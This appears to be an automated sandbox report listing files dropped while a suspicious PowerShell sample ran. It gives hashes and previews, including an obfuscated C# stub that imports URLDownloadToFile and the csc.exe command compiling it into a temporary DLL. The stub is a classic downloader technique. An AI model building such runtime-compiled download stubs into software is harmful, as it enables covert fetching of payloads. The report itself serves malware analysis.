                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:03 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1328
                                                                                                                                                                                                                  Entropy (8bit):3.9879101224778273
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:Hfe9E2U3Gm9ZdHUwKdNWI+ycuZhNjakSFPNnqSqd:r3GmN7Kd41ulja3fqSK
                                                                                                                                                                                                                  MD5:57D88633AF5D0D2EF3CD4633B58D81C2
                                                                                                                                                                                                                  SHA1:BDA5D239EB690CB365C77697D4432625F8CC2777
                                                                                                                                                                                                                  SHA-256:241378B2995EC9718A254D5FC3D93D97587AFD37B2AB76622C086A4F3E107681
                                                                                                                                                                                                                  SHA-512:9643C081D50DBD5B42A5F70FD33ACD777579A45AF4266F3619CCB1862C15D4498FA3FEF40C1149368A0C01406ED24E10AA61FF576E49FE69C2B2C59C88B1CB2D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:L.....#g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP...............V..Br:Jp..M"..%..........4.......C:\Users\user\AppData\Local\Temp\RES7A10.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.c.y.g.t.r.x.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:23 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1328
                                                                                                                                                                                                                  Entropy (8bit):3.981687438643117
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:HTe9ERj24dH3hwKdNWI+ycuZhN5akS3PNnqSqd:dvaKd41ul5a3lqSK
                                                                                                                                                                                                                  MD5:29052E177B97F14E4EE6A5420EBB8AA7
                                                                                                                                                                                                                  SHA1:FEB5AC080C1F76A98B0A0DA932BB1F31850B76B6
                                                                                                                                                                                                                  SHA-256:E623E007B4B8F17A4436DECAE845A1C157AA3CB53750409CA3CA2F56FFCBCBD5
                                                                                                                                                                                                                  SHA-512:3D3C5BD9FCCD4CF1D8DED9202FB6E4267A257FA478A3FF8DEA4A14AB92F8136EF34027C6E21636852AEA2900C8710C9E2ADD133A3C3A65171FB40CEFA4F8CF79
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:L.....#g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP.........................H................4.......C:\Users\user\AppData\Local\Temp\RESC85F.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.e.v.o.d.4.5.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                                                  Entropy (8bit):1.1402803568936057
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:091U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:09EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                                  MD5:5EC075DF695FC53A8DB65B79226CFDEE
                                                                                                                                                                                                                  SHA1:1F3542A2D0180FBAA4B9E6CAC0EF16BF796431B2
                                                                                                                                                                                                                  SHA-256:30395F7A4A21180950C8B90C6882ECA06B9560B55AE86E89B007CBD53AC02D08
                                                                                                                                                                                                                  SHA-512:2803A4814CA43B8B98CE9331E0EDA494B16C4634459B03281E04C543F3356317036B7ADD4BC2BDAAF604F545D8048A1FEE2A422D613805F2AC14E3E5BEB7DA2B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....... ........................u..............................;:...{..4....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                                                  Entropy (8bit):1.1402803568936057
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:091U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:09EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                                  MD5:5EC075DF695FC53A8DB65B79226CFDEE
                                                                                                                                                                                                                  SHA1:1F3542A2D0180FBAA4B9E6CAC0EF16BF796431B2
                                                                                                                                                                                                                  SHA-256:30395F7A4A21180950C8B90C6882ECA06B9560B55AE86E89B007CBD53AC02D08
                                                                                                                                                                                                                  SHA-512:2803A4814CA43B8B98CE9331E0EDA494B16C4634459B03281E04C543F3356317036B7ADD4BC2BDAAF604F545D8048A1FEE2A422D613805F2AC14E3E5BEB7DA2B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....... ........................u..............................;:...{..4....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                                                  Entropy (8bit):3.0843877359437246
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryICak7YnqqzDPN5Dlq5J:+RI+ycuZhN5akS3PNnqX
                                                                                                                                                                                                                  MD5:907FCAD9F4A2FADA8C4881111EE3CDF7
                                                                                                                                                                                                                  SHA1:404D28B4A5E36DD1614705EE117B95C87D80F294
                                                                                                                                                                                                                  SHA-256:0EE37D435A333E04C3888941951A71C936464E0ACFD18E52657180650BEE5553
                                                                                                                                                                                                                  SHA-512:341F62C3EEDDB5262A0E49384911D82EF3415BE4400F6D1EE19F29270C42FA1D924F033F440CE1508572A6DA7B02BF54A2075296360A41659A7A38338F1FB324
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.e.v.o.d.4.5.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.e.v.o.d.4.5.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):469
                                                                                                                                                                                                                  Entropy (8bit):3.718774945115849
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuclr/VMGpFQXReKJ8SRHy4H0qILmiEWOYey:V/DTLDfuctXSXfHi+Wtey
                                                                                                                                                                                                                  MD5:727AC40544404E45480F402CFA6F0FAC
                                                                                                                                                                                                                  SHA1:D2C20E9E01B6C518C264D7ACDF3B11EFCAD11E72
                                                                                                                                                                                                                  SHA-256:33E16396400813988F0768EA7C3C1C216D5E3F037D6344890E5E2F0123287540
                                                                                                                                                                                                                  SHA-512:4A7F4FC8510AAD13A8537BD7BE94F8442D85A3FE9A565FE2CF7D6DB9144267FDFF6800A5A7DE63348A6BA3D75BB4EB03AB848D507297BEB706F5BEE6848F595D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace puNQBvGEu.{. public class beKlAqtAa. {. [DllImport("urlmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr wLAagwow,string n,string GRj,uint gwp,IntPtr qvW);.. }..}.
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                                                  Entropy (8bit):5.223309984591696
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f8YUzxs7+AEszIP23f8k9:p37Lvkmb6KzyWZEo3
                                                                                                                                                                                                                  MD5:C23D11AC804A21E68966445D23AC5367
                                                                                                                                                                                                                  SHA1:E39F28A5E260F215D83D1D073D6D2782F1EC6643
                                                                                                                                                                                                                  SHA-256:3DF6628DAE90ADE6416942E6A7F3AD0B14D8D39177F7B707855E1498AEE788CE
                                                                                                                                                                                                                  SHA-512:3D4C880BC589D6826F45D41BCA7E0B76F3B03A649554329F8F50A6EB9E676D7236C7DE7228936211F085F26589BFA7BFF795D8E05449709849A1F68F4ED59A35
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\revod450\revod450.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\revod450\revod450.0.cs"
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                                                  Entropy (8bit):2.80591080503015
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:etGSdPBu5exl8e6WkEd/Ft5CAtkZfzTVdgwjcUWI+ycuZhN5akS3PNnq:6Gsx+e649Ft5CnJ/VdtA31ul5a3lq
                                                                                                                                                                                                                  MD5:E98C30826828825AE866FB5EDBAF4FC5
                                                                                                                                                                                                                  SHA1:BB2DEE076804636B5D9567B926E1DFE00B2E5868
                                                                                                                                                                                                                  SHA-256:A517C992606804D80DD0678DBF83F86BAA4D92699C0203A3E9D43179A6A276CE
                                                                                                                                                                                                                  SHA-512:9A324728BC824201A4B36915EABE5D4D3813B059F7502841F63BD6BCC23C4FB855D04BF2C4030EA672C4580EBC68BA10D2EBC8F47F90D945986F12524515000C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.....q.....q...........................!.............. B.....P ......T.........Z.....c.....e.....i.....m...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.re
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):866
                                                                                                                                                                                                                  Entropy (8bit):5.3238037462537715
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:AId3ka6KzjEo+KaMD5DqBVKVrdFAMBJTH:Akka60jEo+KdDcVKdBJj
                                                                                                                                                                                                                  MD5:AEEF61205606141344D2BAA2102744AA
                                                                                                                                                                                                                  SHA1:C60D7F70394C4F8B0DE12564FB509E3AEB2C329F
                                                                                                                                                                                                                  SHA-256:8F43B161EBDF385E6470EA19F1CE87E2E5B23C30C9CD30A661E63DB887D236C0
                                                                                                                                                                                                                  SHA-512:2F3E25717A9088132B635541722B1015C819A27449127A779ABA085D95FB888E75679BC683819396A5728442FC1DCFB54A9D3071ADEB10F0EE631A52CD2BD487
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\revod450\revod450.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\revod450\revod450.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
